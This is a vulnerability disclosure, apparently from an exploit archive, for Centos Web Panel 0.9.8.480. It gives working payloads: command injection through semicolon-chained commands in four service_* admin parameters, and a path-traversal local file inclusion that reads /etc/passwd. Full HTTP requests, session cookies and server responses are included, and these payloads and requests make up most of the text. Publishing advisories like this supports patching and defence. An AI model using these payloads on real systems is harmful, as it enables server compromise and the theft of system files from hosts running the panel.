# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities # Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com) # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/system-requirements # Version: 0.9.8.480 # Tested on: Centos 7 # Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection # CVE: - ### Vulnerability Name: Command Injection ### 1) Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x Parameter Name: service_start Parameter Type: GET Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx HTTP Request: GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1 Host: localhost:2030 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D Referer: http://localhost:2030/admin/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239. HTTP Response: HTTP/1.1 200 OK Server: cwpsrv X-Powered-By: PHP/7.0.24 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Date: Mon, 01 Oct 2018 21:06:42 GMT Cache-Control: no-store, no-cache, must-revalidate HTML Content:
WARNING! 
268409239
        sh: x.service: command not found

2) Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x Parameter Name: service_restart Parameter Type: GET Attack Pattern: sshd%3bexpr+268409241+-+2%3bx 3) Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x Parameter Name: service_fullstatus Parameter Type: GET Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx 4) Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x Parameter Name: service_stop Parameter Type: GET Attack Pattern: named%3bexpr+268409241+-+2%3bx ### Vulnerability Name: Local File Inclusion ### 1) Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd Parameter Name: file Parameter Type: GET Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP Request: GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: localhost:2030 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D Referer: http://localhost:2030/admin/index.php User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 HTTP Response: HTTP/1.1 200 OK Server: cwpsrv X-Powered-By: PHP/7.0.24 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Date: Mon, 01 Oct 2018 20:45:19 GMT Cache-Control: no-store, no-cache, must-revalidate HTML Content: File info [stats]:
-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd

Contents of File: /../../../../../../../../../../../etc/passwd